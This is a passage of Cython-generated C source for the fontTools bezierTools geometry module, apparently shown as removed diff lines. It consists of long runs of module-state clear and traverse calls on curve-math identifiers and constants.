Py_CLEAR(clear_module_state->__pyx_codeobj__60); - Py_CLEAR(clear_module_state->__pyx_codeobj__62); - Py_CLEAR(clear_module_state->__pyx_codeobj__64); - Py_CLEAR(clear_module_state->__pyx_codeobj__66); - Py_CLEAR(clear_module_state->__pyx_codeobj__68); - Py_CLEAR(clear_module_state->__pyx_codeobj__70); - Py_CLEAR(clear_module_state->__pyx_codeobj__72); - Py_CLEAR(clear_module_state->__pyx_codeobj__74); - Py_CLEAR(clear_module_state->__pyx_codeobj__76); - Py_CLEAR(clear_module_state->__pyx_codeobj__78); - Py_CLEAR(clear_module_state->__pyx_codeobj__80); - Py_CLEAR(clear_module_state->__pyx_codeobj__82); - Py_CLEAR(clear_module_state->__pyx_codeobj__84); - Py_CLEAR(clear_module_state->__pyx_codeobj__86); - Py_CLEAR(clear_module_state->__pyx_codeobj__88); - Py_CLEAR(clear_module_state->__pyx_codeobj__90); - Py_CLEAR(clear_module_state->__pyx_codeobj__93); - Py_CLEAR(clear_module_state->__pyx_codeobj__96); - 
Py_CLEAR(clear_module_state->__pyx_codeobj__98); - Py_CLEAR(clear_module_state->__pyx_codeobj__100); - Py_CLEAR(clear_module_state->__pyx_codeobj__102); - return 0; -} -#endif -/* #### Code section: module_state_traverse ### */ -#if CYTHON_USE_MODULE_STATE -static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { - __pyx_mstate *traverse_module_state = __pyx_mstate(m); - if (!traverse_module_state) return 0; - Py_VISIT(traverse_module_state->__pyx_d); - Py_VISIT(traverse_module_state->__pyx_b); - Py_VISIT(traverse_module_state->__pyx_cython_runtime); - Py_VISIT(traverse_module_state->__pyx_empty_tuple); - Py_VISIT(traverse_module_state->__pyx_empty_bytes); - Py_VISIT(traverse_module_state->__pyx_empty_unicode); - #ifdef __Pyx_CyFunction_USED - Py_VISIT(traverse_module_state->__pyx_CyFunctionType); - #endif - #ifdef __Pyx_FusedFunction_USED - Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); - #endif - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - 
Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_VISIT(traverse_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_VISIT(traverse_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_1_t); - Py_VISIT(traverse_module_state->__pyx_n_s_1_t_2); - Py_VISIT(traverse_module_state->__pyx_n_s_2_t_1_t); - Py_VISIT(traverse_module_state->__pyx_kp_u_Approximates_the_arc_length_for); - Py_VISIT(traverse_module_state->__pyx_n_s_AttributeError); - Py_VISIT(traverse_module_state->__pyx_n_s_COMPILED); - Py_VISIT(traverse_module_state->__pyx_kp_u_Calculates_the_arc_length_for_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl); - Py_VISIT(traverse_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_Couldn_t_work_out_which_intersec); - Py_VISIT(traverse_module_state->__pyx_n_s_DD); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_a_cu); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_a_cu_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_two); - Py_VISIT(traverse_module_state->__pyx_kp_u_Finds_intersections_between_two_2); - Py_VISIT(traverse_module_state->__pyx_n_s_Identity); - Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); - Py_VISIT(traverse_module_state->__pyx_n_s_Intersection); - Py_VISIT(traverse_module_state->__pyx_n_u_Intersection); - Py_VISIT(traverse_module_state->__pyx_n_s_Len); - Py_VISIT(traverse_module_state->__pyx_kp_s_Lib_fontTools_misc_bezierTools_p); - 
Py_VISIT(traverse_module_state->__pyx_n_s_Q); - Py_VISIT(traverse_module_state->__pyx_n_s_Q3); - Py_VISIT(traverse_module_state->__pyx_n_s_R); - Py_VISIT(traverse_module_state->__pyx_n_s_R2); - Py_VISIT(traverse_module_state->__pyx_n_s_R2_Q3); - Py_VISIT(traverse_module_state->__pyx_kp_u_Solve_a_cubic_equation_Solves_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_line_at_a_given_coordina); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a); - Py_VISIT(traverse_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2); - Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); - Py_VISIT(traverse_module_state->__pyx_kp_u_Unknown_curve_degree); - Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); - Py_VISIT(traverse_module_state->__pyx_kp_u__10); - Py_VISIT(traverse_module_state->__pyx_n_s__103); - Py_VISIT(traverse_module_state->__pyx_n_s__11); - Py_VISIT(traverse_module_state->__pyx_kp_u__9); - Py_VISIT(traverse_module_state->__pyx_n_s__91); - Py_VISIT(traverse_module_state->__pyx_n_s_a); - Py_VISIT(traverse_module_state->__pyx_n_s_a1); - Py_VISIT(traverse_module_state->__pyx_n_s_a1_3); - Py_VISIT(traverse_module_state->__pyx_n_s_a1x); - Py_VISIT(traverse_module_state->__pyx_n_s_a1y); - Py_VISIT(traverse_module_state->__pyx_n_s_a2); - Py_VISIT(traverse_module_state->__pyx_n_s_a3); - Py_VISIT(traverse_module_state->__pyx_n_s_acos); - Py_VISIT(traverse_module_state->__pyx_n_s_aligned_curve); - Py_VISIT(traverse_module_state->__pyx_n_s_alignment_transformation); - Py_VISIT(traverse_module_state->__pyx_n_s_all); - Py_VISIT(traverse_module_state->__pyx_n_s_angle); - Py_VISIT(traverse_module_state->__pyx_n_s_append); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateCubicArcLength); - 
Py_VISIT(traverse_module_state->__pyx_n_s_approximateCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_kp_u_approximateCubicArcLength_line_3); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_approximateQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_approximateQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_s_arch); - Py_VISIT(traverse_module_state->__pyx_n_s_args); - Py_VISIT(traverse_module_state->__pyx_n_s_asinh); - Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); - Py_VISIT(traverse_module_state->__pyx_n_s_atan2); - Py_VISIT(traverse_module_state->__pyx_n_s_ax); - Py_VISIT(traverse_module_state->__pyx_n_s_ax2); - Py_VISIT(traverse_module_state->__pyx_n_s_ax3); - Py_VISIT(traverse_module_state->__pyx_n_s_ay); - Py_VISIT(traverse_module_state->__pyx_n_s_ay2); - Py_VISIT(traverse_module_state->__pyx_n_s_ay3); - Py_VISIT(traverse_module_state->__pyx_n_s_b); - Py_VISIT(traverse_module_state->__pyx_n_s_b1); - Py_VISIT(traverse_module_state->__pyx_n_s_b1x); - Py_VISIT(traverse_module_state->__pyx_n_s_b1y); - Py_VISIT(traverse_module_state->__pyx_n_s_both_points_are_on_same_side_of); - Py_VISIT(traverse_module_state->__pyx_n_s_bounds1); - Py_VISIT(traverse_module_state->__pyx_n_s_bounds2); - Py_VISIT(traverse_module_state->__pyx_n_s_box); - Py_VISIT(traverse_module_state->__pyx_n_s_bx); - Py_VISIT(traverse_module_state->__pyx_n_s_bx2); - Py_VISIT(traverse_module_state->__pyx_n_s_by); - Py_VISIT(traverse_module_state->__pyx_n_s_by2); - Py_VISIT(traverse_module_state->__pyx_n_s_c); - Py_VISIT(traverse_module_state->__pyx_n_s_c1); - Py_VISIT(traverse_module_state->__pyx_n_s_c11); - Py_VISIT(traverse_module_state->__pyx_n_s_c11_range); - Py_VISIT(traverse_module_state->__pyx_n_s_c12); - 
Py_VISIT(traverse_module_state->__pyx_n_s_c12_range); - Py_VISIT(traverse_module_state->__pyx_n_s_c1x); - Py_VISIT(traverse_module_state->__pyx_n_s_c1y); - Py_VISIT(traverse_module_state->__pyx_n_s_c21); - Py_VISIT(traverse_module_state->__pyx_n_s_c21_range); - Py_VISIT(traverse_module_state->__pyx_n_s_c22); - Py_VISIT(traverse_module_state->__pyx_n_s_c22_range); - Py_VISIT(traverse_module_state->__pyx_n_s_calcBounds); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_calcCubicArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_calcCubicArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicArcLengthCRecurse); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicBounds); - Py_VISIT(traverse_module_state->__pyx_n_u_calcCubicBounds); - Py_VISIT(traverse_module_state->__pyx_kp_u_calcCubicBounds_line_412); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicParameters); - Py_VISIT(traverse_module_state->__pyx_n_s_calcCubicPoints); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_u_calcQuadraticArcLength); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_n_u_calcQuadraticArcLengthC); - Py_VISIT(traverse_module_state->__pyx_kp_u_calcQuadraticArcLength_line_151); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticBounds); - Py_VISIT(traverse_module_state->__pyx_n_u_calcQuadraticBounds); - Py_VISIT(traverse_module_state->__pyx_kp_u_calcQuadraticBounds_line_298); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticParameters); - Py_VISIT(traverse_module_state->__pyx_n_s_calcQuadraticPoints); - Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); - Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); - Py_VISIT(traverse_module_state->__pyx_n_s_close); - 
Py_VISIT(traverse_module_state->__pyx_n_s_collections); - Py_VISIT(traverse_module_state->__pyx_n_s_cos); - Py_VISIT(traverse_module_state->__pyx_n_s_cubicPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_cubicPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_cubicPointAtTC); - Py_VISIT(traverse_module_state->__pyx_n_u_cubicPointAtTC); - Py_VISIT(traverse_module_state->__pyx_n_s_curve); - Py_VISIT(traverse_module_state->__pyx_n_s_curve1); - Py_VISIT(traverse_module_state->__pyx_n_s_curve2); - Py_VISIT(traverse_module_state->__pyx_n_s_curveCurveIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_curveCurveIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_curveCurveIntersections_line_137); - Py_VISIT(traverse_module_state->__pyx_n_s_curveLineIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_curveLineIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_curveLineIntersections_line_1248); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_bounds); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_curve_intersections_t); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_curve_intersections_t_loc); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_curve_intersections_t_loc_2); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_line_intersections_t); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_line_intersections_t_loca); - Py_VISIT(traverse_module_state->__pyx_n_s_cx); - Py_VISIT(traverse_module_state->__pyx_n_s_cy); - Py_VISIT(traverse_module_state->__pyx_n_s_cython); - Py_VISIT(traverse_module_state->__pyx_n_s_d); - Py_VISIT(traverse_module_state->__pyx_n_s_d0); - Py_VISIT(traverse_module_state->__pyx_n_s_d1); - Py_VISIT(traverse_module_state->__pyx_n_s_d1x); - Py_VISIT(traverse_module_state->__pyx_n_s_d1y); - Py_VISIT(traverse_module_state->__pyx_n_s_delta); - Py_VISIT(traverse_module_state->__pyx_n_s_delta_2); - Py_VISIT(traverse_module_state->__pyx_n_s_delta_3); - Py_VISIT(traverse_module_state->__pyx_n_s_deriv3); - 
Py_VISIT(traverse_module_state->__pyx_kp_u_disable); - Py_VISIT(traverse_module_state->__pyx_n_s_doctest); - Py_VISIT(traverse_module_state->__pyx_n_s_dx); - Py_VISIT(traverse_module_state->__pyx_n_s_dy); - Py_VISIT(traverse_module_state->__pyx_n_s_e); - Py_VISIT(traverse_module_state->__pyx_n_s_e1); - Py_VISIT(traverse_module_state->__pyx_n_s_e1x); - Py_VISIT(traverse_module_state->__pyx_n_s_e1y); - Py_VISIT(traverse_module_state->__pyx_n_s_e2); - Py_VISIT(traverse_module_state->__pyx_n_s_e2x); - Py_VISIT(traverse_module_state->__pyx_n_s_e2y); - Py_VISIT(traverse_module_state->__pyx_kp_u_enable); - Py_VISIT(traverse_module_state->__pyx_n_s_end); - Py_VISIT(traverse_module_state->__pyx_n_s_epsilon); - Py_VISIT(traverse_module_state->__pyx_n_s_epsilonDigits); - Py_VISIT(traverse_module_state->__pyx_n_s_ex); - Py_VISIT(traverse_module_state->__pyx_n_s_exit); - Py_VISIT(traverse_module_state->__pyx_n_s_ey); - Py_VISIT(traverse_module_state->__pyx_n_s_failed); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc_arrayTools); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc_bezierTools); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc_transform); - Py_VISIT(traverse_module_state->__pyx_n_s_found); - Py_VISIT(traverse_module_state->__pyx_kp_u_g); - Py_VISIT(traverse_module_state->__pyx_kp_u_gc); - Py_VISIT(traverse_module_state->__pyx_n_s_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_i); - Py_VISIT(traverse_module_state->__pyx_n_s_import); - Py_VISIT(traverse_module_state->__pyx_n_s_initializing); - Py_VISIT(traverse_module_state->__pyx_n_s_insert); - Py_VISIT(traverse_module_state->__pyx_n_s_intersection_ts); - Py_VISIT(traverse_module_state->__pyx_n_s_intersections); - Py_VISIT(traverse_module_state->__pyx_n_s_intersects); - Py_VISIT(traverse_module_state->__pyx_n_s_isHorizontal); - Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); - 
Py_VISIT(traverse_module_state->__pyx_n_s_isclose); - Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); - Py_VISIT(traverse_module_state->__pyx_n_s_it); - Py_VISIT(traverse_module_state->__pyx_n_s_key); - Py_VISIT(traverse_module_state->__pyx_n_s_line); - Py_VISIT(traverse_module_state->__pyx_n_s_lineLineIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_lineLineIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_lineLineIntersections_line_1147); - Py_VISIT(traverse_module_state->__pyx_n_s_linePointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_linePointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_line_t); - Py_VISIT(traverse_module_state->__pyx_n_s_line_t_of_pt); - Py_VISIT(traverse_module_state->__pyx_n_s_main); - Py_VISIT(traverse_module_state->__pyx_n_u_main); - Py_VISIT(traverse_module_state->__pyx_n_s_math); - Py_VISIT(traverse_module_state->__pyx_n_s_mid); - Py_VISIT(traverse_module_state->__pyx_n_s_midPt); - Py_VISIT(traverse_module_state->__pyx_n_s_midpoint); - Py_VISIT(traverse_module_state->__pyx_n_s_mult); - Py_VISIT(traverse_module_state->__pyx_n_s_n); - Py_VISIT(traverse_module_state->__pyx_n_s_name); - Py_VISIT(traverse_module_state->__pyx_n_s_namedtuple); - Py_VISIT(traverse_module_state->__pyx_n_s_obj); - Py_VISIT(traverse_module_state->__pyx_n_s_off1); - Py_VISIT(traverse_module_state->__pyx_n_s_off2); - Py_VISIT(traverse_module_state->__pyx_n_s_one); - Py_VISIT(traverse_module_state->__pyx_n_s_origDist); - Py_VISIT(traverse_module_state->__pyx_n_s_origin); - Py_VISIT(traverse_module_state->__pyx_n_s_p0); - Py_VISIT(traverse_module_state->__pyx_n_s_p1); - Py_VISIT(traverse_module_state->__pyx_n_s_p2); - Py_VISIT(traverse_module_state->__pyx_n_s_p3); - Py_VISIT(traverse_module_state->__pyx_n_s_pi); - Py_VISIT(traverse_module_state->__pyx_n_s_pointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_pointFinder); - Py_VISIT(traverse_module_state->__pyx_n_s_points); - Py_VISIT(traverse_module_state->__pyx_n_s_precision); - 
Py_VISIT(traverse_module_state->__pyx_n_s_print); - Py_VISIT(traverse_module_state->__pyx_n_s_printSegments); - Py_VISIT(traverse_module_state->__pyx_n_s_pt); - Py_VISIT(traverse_module_state->__pyx_n_u_pt); - Py_VISIT(traverse_module_state->__pyx_n_s_pt1); - Py_VISIT(traverse_module_state->__pyx_n_s_pt1x); - Py_VISIT(traverse_module_state->__pyx_n_s_pt1y); - Py_VISIT(traverse_module_state->__pyx_n_s_pt2); - Py_VISIT(traverse_module_state->__pyx_n_s_pt2x); - Py_VISIT(traverse_module_state->__pyx_n_s_pt2y); - Py_VISIT(traverse_module_state->__pyx_n_s_pt3); - Py_VISIT(traverse_module_state->__pyx_n_s_pt4); - Py_VISIT(traverse_module_state->__pyx_n_s_px); - Py_VISIT(traverse_module_state->__pyx_n_s_py); - Py_VISIT(traverse_module_state->__pyx_n_s_quadraticPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_quadraticPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_r); - Py_VISIT(traverse_module_state->__pyx_n_s_rDD); - Py_VISIT(traverse_module_state->__pyx_n_s_rQ2); - Py_VISIT(traverse_module_state->__pyx_n_s_range); - Py_VISIT(traverse_module_state->__pyx_n_s_range1); - Py_VISIT(traverse_module_state->__pyx_n_s_range2); - Py_VISIT(traverse_module_state->__pyx_n_s_rectArea); - Py_VISIT(traverse_module_state->__pyx_n_s_roots); - Py_VISIT(traverse_module_state->__pyx_n_s_rotate); - Py_VISIT(traverse_module_state->__pyx_n_s_round); - Py_VISIT(traverse_module_state->__pyx_n_s_s); - Py_VISIT(traverse_module_state->__pyx_n_s_s1); - Py_VISIT(traverse_module_state->__pyx_n_s_s1x); - Py_VISIT(traverse_module_state->__pyx_n_s_s1y); - Py_VISIT(traverse_module_state->__pyx_n_s_s2); - Py_VISIT(traverse_module_state->__pyx_n_s_s2x); - Py_VISIT(traverse_module_state->__pyx_n_s_s2y); - Py_VISIT(traverse_module_state->__pyx_kp_u_s_2); - Py_VISIT(traverse_module_state->__pyx_n_s_scale); - Py_VISIT(traverse_module_state->__pyx_n_s_sectRect); - Py_VISIT(traverse_module_state->__pyx_n_s_seen); - Py_VISIT(traverse_module_state->__pyx_n_s_seg); - 
Py_VISIT(traverse_module_state->__pyx_n_s_seg1); - Py_VISIT(traverse_module_state->__pyx_n_s_seg2); - Py_VISIT(traverse_module_state->__pyx_n_s_segment); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_segmentPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentSegmentIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_segmentSegmentIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_segmentSegmentIntersections_line); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentrepr); - Py_VISIT(traverse_module_state->__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_segmentrepr_line_1449); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentrepr_locals_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_segments); - Py_VISIT(traverse_module_state->__pyx_n_s_send); - Py_VISIT(traverse_module_state->__pyx_n_s_slope12); - Py_VISIT(traverse_module_state->__pyx_n_s_slope34); - Py_VISIT(traverse_module_state->__pyx_n_s_solutions); - Py_VISIT(traverse_module_state->__pyx_n_s_solveCubic); - Py_VISIT(traverse_module_state->__pyx_n_u_solveCubic); - Py_VISIT(traverse_module_state->__pyx_kp_u_solveCubic_line_841); - Py_VISIT(traverse_module_state->__pyx_n_s_solveQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_u_solveQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_s_spec); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubic); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubic); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtTC_2); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtT_2); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubicAtT_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitCubicAtT_line_613); - 
Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicIntoTwoAtTC); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubicIntoTwoAtTC); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitCubic_line_552); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubic_locals_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_splitLine); - Py_VISIT(traverse_module_state->__pyx_n_u_splitLine); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitLine_line_450); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_u_splitQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadraticAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadraticAtT_2); - Py_VISIT(traverse_module_state->__pyx_n_u_splitQuadraticAtT_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitQuadraticAtT_line_589); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitQuadratic_line_507); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadratic_locals_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_split_cubic_into_two); - Py_VISIT(traverse_module_state->__pyx_n_s_split_segment_at_t); - Py_VISIT(traverse_module_state->__pyx_n_s_sqrt); - Py_VISIT(traverse_module_state->__pyx_n_s_start); - Py_VISIT(traverse_module_state->__pyx_n_s_swapped); - Py_VISIT(traverse_module_state->__pyx_n_s_sx); - Py_VISIT(traverse_module_state->__pyx_n_s_sy); - Py_VISIT(traverse_module_state->__pyx_n_s_sys); - Py_VISIT(traverse_module_state->__pyx_n_s_t); - Py_VISIT(traverse_module_state->__pyx_n_s_t1); - Py_VISIT(traverse_module_state->__pyx_n_u_t1); - Py_VISIT(traverse_module_state->__pyx_n_s_t1_2); - Py_VISIT(traverse_module_state->__pyx_n_s_t1_3); - Py_VISIT(traverse_module_state->__pyx_n_s_t2); - Py_VISIT(traverse_module_state->__pyx_n_u_t2); - Py_VISIT(traverse_module_state->__pyx_n_s_test); - Py_VISIT(traverse_module_state->__pyx_n_s_testmod); - Py_VISIT(traverse_module_state->__pyx_n_s_theta); - Py_VISIT(traverse_module_state->__pyx_n_s_throw); - 
Py_VISIT(traverse_module_state->__pyx_n_s_tolerance); - Py_VISIT(traverse_module_state->__pyx_n_s_transformPoints); - Py_VISIT(traverse_module_state->__pyx_n_s_translate); - Py_VISIT(traverse_module_state->__pyx_n_s_ts); - Py_VISIT(traverse_module_state->__pyx_n_s_two); - Py_VISIT(traverse_module_state->__pyx_n_s_unique_key); - Py_VISIT(traverse_module_state->__pyx_n_s_unique_values); - Py_VISIT(traverse_module_state->__pyx_n_s_v0); - Py_VISIT(traverse_module_state->__pyx_n_s_v1); - Py_VISIT(traverse_module_state->__pyx_n_s_v2); - Py_VISIT(traverse_module_state->__pyx_n_s_v3); - Py_VISIT(traverse_module_state->__pyx_n_s_v4); - Py_VISIT(traverse_module_state->__pyx_n_s_where); - Py_VISIT(traverse_module_state->__pyx_n_s_x); - Py_VISIT(traverse_module_state->__pyx_n_s_x0); - Py_VISIT(traverse_module_state->__pyx_n_s_x1); - Py_VISIT(traverse_module_state->__pyx_n_s_x2); - Py_VISIT(traverse_module_state->__pyx_n_s_x3); - Py_VISIT(traverse_module_state->__pyx_n_s_x4); - Py_VISIT(traverse_module_state->__pyx_n_s_xDiff); - Py_VISIT(traverse_module_state->__pyx_n_s_xRoots); - Py_VISIT(traverse_module_state->__pyx_n_s_y); - Py_VISIT(traverse_module_state->__pyx_n_s_y1); - Py_VISIT(traverse_module_state->__pyx_n_s_y2); - Py_VISIT(traverse_module_state->__pyx_n_s_y3); - Py_VISIT(traverse_module_state->__pyx_n_s_y4); - Py_VISIT(traverse_module_state->__pyx_n_s_yDiff); - Py_VISIT(traverse_module_state->__pyx_n_s_yRoots); - Py_VISIT(traverse_module_state->__pyx_float_0_0); - Py_VISIT(traverse_module_state->__pyx_float_0_5); - Py_VISIT(traverse_module_state->__pyx_float_1_0); - Py_VISIT(traverse_module_state->__pyx_float_2_0); - Py_VISIT(traverse_module_state->__pyx_float_3_0); - Py_VISIT(traverse_module_state->__pyx_float_4_0); - Py_VISIT(traverse_module_state->__pyx_float_9_0); - Py_VISIT(traverse_module_state->__pyx_float_1eneg_3); - Py_VISIT(traverse_module_state->__pyx_float_27_0); - Py_VISIT(traverse_module_state->__pyx_float_54_0); - 
Py_VISIT(traverse_module_state->__pyx_float_0_005); - Py_VISIT(traverse_module_state->__pyx_float_0_125); - Py_VISIT(traverse_module_state->__pyx_float_1eneg_10); - Py_VISIT(traverse_module_state->__pyx_float_neg_2_0); - Py_VISIT(traverse_module_state->__pyx_int_0); - Py_VISIT(traverse_module_state->__pyx_int_1); - Py_VISIT(traverse_module_state->__pyx_int_2); - Py_VISIT(traverse_module_state->__pyx_int_3); - Py_VISIT(traverse_module_state->__pyx_int_6); - Py_VISIT(traverse_module_state->__pyx_int_neg_1); - Py_VISIT(traverse_module_state->__pyx_codeobj_); - Py_VISIT(traverse_module_state->__pyx_tuple__2); - Py_VISIT(traverse_module_state->__pyx_tuple__4); - Py_VISIT(traverse_module_state->__pyx_tuple__5); - Py_VISIT(traverse_module_state->__pyx_tuple__6); - Py_VISIT(traverse_module_state->__pyx_tuple__8); - Py_VISIT(traverse_module_state->__pyx_tuple__12); - Py_VISIT(traverse_module_state->__pyx_tuple__14); - Py_VISIT(traverse_module_state->__pyx_tuple__15); - Py_VISIT(traverse_module_state->__pyx_tuple__17); - Py_VISIT(traverse_module_state->__pyx_tuple__19); - Py_VISIT(traverse_module_state->__pyx_tuple__21); - Py_VISIT(traverse_module_state->__pyx_tuple__23); - Py_VISIT(traverse_module_state->__pyx_tuple__26); - Py_VISIT(traverse_module_state->__pyx_tuple__28); - Py_VISIT(traverse_module_state->__pyx_tuple__30); - Py_VISIT(traverse_module_state->__pyx_tuple__32); - Py_VISIT(traverse_module_state->__pyx_tuple__34); - Py_VISIT(traverse_module_state->__pyx_tuple__36); - Py_VISIT(traverse_module_state->__pyx_tuple__38); - Py_VISIT(traverse_module_state->__pyx_tuple__40); - Py_VISIT(traverse_module_state->__pyx_tuple__42); - Py_VISIT(traverse_module_state->__pyx_tuple__44); - Py_VISIT(traverse_module_state->__pyx_tuple__46); - Py_VISIT(traverse_module_state->__pyx_tuple__48); - Py_VISIT(traverse_module_state->__pyx_tuple__50); - Py_VISIT(traverse_module_state->__pyx_tuple__52); - Py_VISIT(traverse_module_state->__pyx_tuple__53); - 
